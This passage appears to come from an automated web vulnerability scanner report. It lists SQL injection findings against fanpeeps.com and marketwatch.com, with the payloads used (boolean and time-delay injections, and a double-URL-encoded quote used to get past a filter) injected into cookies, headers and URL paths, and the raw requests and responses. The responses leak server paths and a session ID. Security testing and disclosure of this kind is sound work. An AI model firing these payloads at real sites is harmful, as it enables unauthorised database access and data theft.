The __utma cookie appears to be vulnerable to SQL injection attacks. The payload '%20and%201%3d1--%20 was submitted in the __utma cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2'%20and%201%3d1--%20; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17345

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.71. http://fanpeeps.com/thumbnailviewer.js [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the __utmc cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936'; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.72. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection. The payload ',0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie, and a database error message was returned. Review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL. WAITFOR DELAY is Microsoft SQL Server syntax that MySQL does not recognise; the error here results from the unbalanced quote and parenthesis breaking the query, not from a delay executing.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)',0,0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:47:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17299

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.73. http://fanpeeps.com/thumbnailviewer.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /thumbnailviewer.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 18151

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /thumbnailviewer.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.74. http://fanpeeps.com/twitterlib.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 17071916'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js17071916'%20or%201%3d1--%20 HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17399

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.75. http://fanpeeps.com/twitterlib.js [Referer HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload 14321639'%20or%201%3d1--%20 was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;
Referer: http://www.google.com/search?hl=en&q=14321639'%20or%201%3d1--%20

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17419

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.76. http://fanpeeps.com/twitterlib.js [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload 15737200'%20or%201%3d1--%20 was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)15737200'%20or%201%3d1--%20
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:46:22 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17433

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.77. http://fanpeeps.com/twitterlib.js [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utma cookie appears to be vulnerable to SQL injection. The payload ',0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utma cookie, and a database error message was returned. Review the error message and the application's handling of other input to confirm whether a vulnerability is present.

The database appears to be MySQL. WAITFOR DELAY is Microsoft SQL Server syntax that MySQL does not recognise; the error here results from the unbalanced quote and parenthesis breaking the query, not from a delay executing.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2',0,0,0)waitfor%20delay'0%3a0%3a20'--; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17401

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

1.78. http://fanpeeps.com/twitterlib.js [__utmc cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application appears to block a raw single quote in this cookie, but the block is circumvented by double URL-encoding the character, submitting %2527 instead of '. PHP URL-decodes cookie values once when it builds $_COOKIE, so the application receives %27; a further urldecode() in application code then yields the quote that reaches the query. Note that a raw ' in the __utmc cookie already produces the error for /thumbnailviewer.css (1.66) and /thumbnailviewer.js (1.71), so confirm whether any filter is actually in place for this path.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages, including PHP warnings, from being returned in responses. There is no need for the application to URL-decode the __utmc cookie value again, since PHP has already decoded it once when populating $_COOKIE. In any case, input validation must run after any custom canonicalisation has been carried out, and the query itself should be parameterised so that the decoded value can never change its structure.

Request 1

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17327

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...

Request 2

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936%2527%2527; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:44:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 53253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.79. http://fanpeeps.com/twitterlib.js [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fanpeeps.com
Path:   /twitterlib.js

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)'; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 17567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
</b>: Invalid argument supplied for foreach() in <b>
...[SNIP]...

Request 2

GET /twitterlib.js HTTP/1.1
Host: fanpeeps.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)''; PHPSESSID=1b50f007cc939a7069acd6837abb18ec; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.9.10.1305376380;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:43:52 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45737

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...

1.80. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/images/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19831040'%20or%201%3d1--%20 and 19831040'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/images19831040'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 1

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE1
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:18:35 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /MW5/content/images19831040'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 2

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:18:35 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

1.81. http://i1.marketwatch.com/MW5/content/images/favicon.ico [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://i1.marketwatch.com
Path:   /MW5/content/images/favicon.ico

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /MW5/content/images/favicon.ico'%20and%201%3d1--%20 HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 1

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-MACHINE: SBKSIMGWEBP01
Content-Length: 103
Date: Sat, 14 May 2011 10:18:36 GMT
Connection: close
Vary: Accept-Encoding

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.

Request 2

GET /MW5/content/images/favicon.ico'%20and%201%3d2--%20 HTTP/1.1
Host: i1.marketwatch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; rsi_csl=; rsi_segs=; BIZO=biz=1053&

Response 2

HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Machine: SB-IMAGE3
X-Powered-By: ASP.NET
Date: Sat, 14 May 2011 10:18:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

